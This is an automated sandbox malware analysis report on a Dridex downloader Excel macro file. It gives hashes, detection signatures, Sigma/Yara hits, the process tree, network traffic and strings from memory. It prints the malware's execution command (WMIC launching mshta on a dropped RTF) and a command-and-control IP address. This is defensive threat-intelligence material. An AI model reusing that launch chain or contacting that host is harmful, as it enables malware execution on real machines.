Windows Analysis Report 56449657.xlsm

Overview

General Information

Sample Name: 56449657.xlsm
Analysis ID: 532311
MD5: 3ff89734f2c6a54fe79464e94151ce10
SHA1: 4b4f24fec70071de89a76b70e12394a56efdcf62
SHA256: 9818931574ed09e96ddc907c47907cfc6fbfad3f6bc3fca1c0f3b210c1d458f4
Tags: Dridex, xlsm
Detection

Hidden Macro 4.0 Dridex Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 4240 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5880 cmdline: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 6000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 1332 cmdline: mshta C:\ProgramData\vqcMnINBAOOJC.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: app.xml
Rule: JoeSecurity_XlsWithMacro4
Description: Yara detected Xls With Macro 4.0
Author: Joe Security

Dropped Files

Source: C:\ProgramData\vqcMnINBAOOJC.rtf
Rule: JoeSecurity_DridexDownloader
Description: Yara detected Dridex Downloader
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: TA505 Dropper Load Pattern
Source: Process started, Author: Florian Roth, Data: Command: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 6000, ProcessCommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, ProcessId: 1332
Sigma detected: Suspicious MSHTA Process Patterns
Source: Process started, Author: Florian Roth, Data: Command: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 6000, ProcessCommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, ProcessId: 1332
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4240, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", ProcessId: 5880
Sigma detected: Suspicious WMI Execution
Source: Process started, Author: Michael Haag, Florian Roth, juju4, oscd.community, Data: Command: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4240, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", ProcessId: 5880

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 56449657.xlsm, ReversingLabs: Detection: 13%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
Source: global traffic, TCP traffic: 192.168.2.4:49826 -> 157.230.250.107:8080
Source: Joe Sandbox View, IP Address: 157.230.250.107
Source: unknown, TCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt3
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net2G#
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netP
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netX
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netg
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups(
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/l
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.662676214.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743475425.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933897142.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782512692.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807834828.00000000131FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787064629.00000000131FC000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/j
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeH
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cortana.ai
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aiZ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietlB
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://cr.office.com
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filter
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/:e
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/R
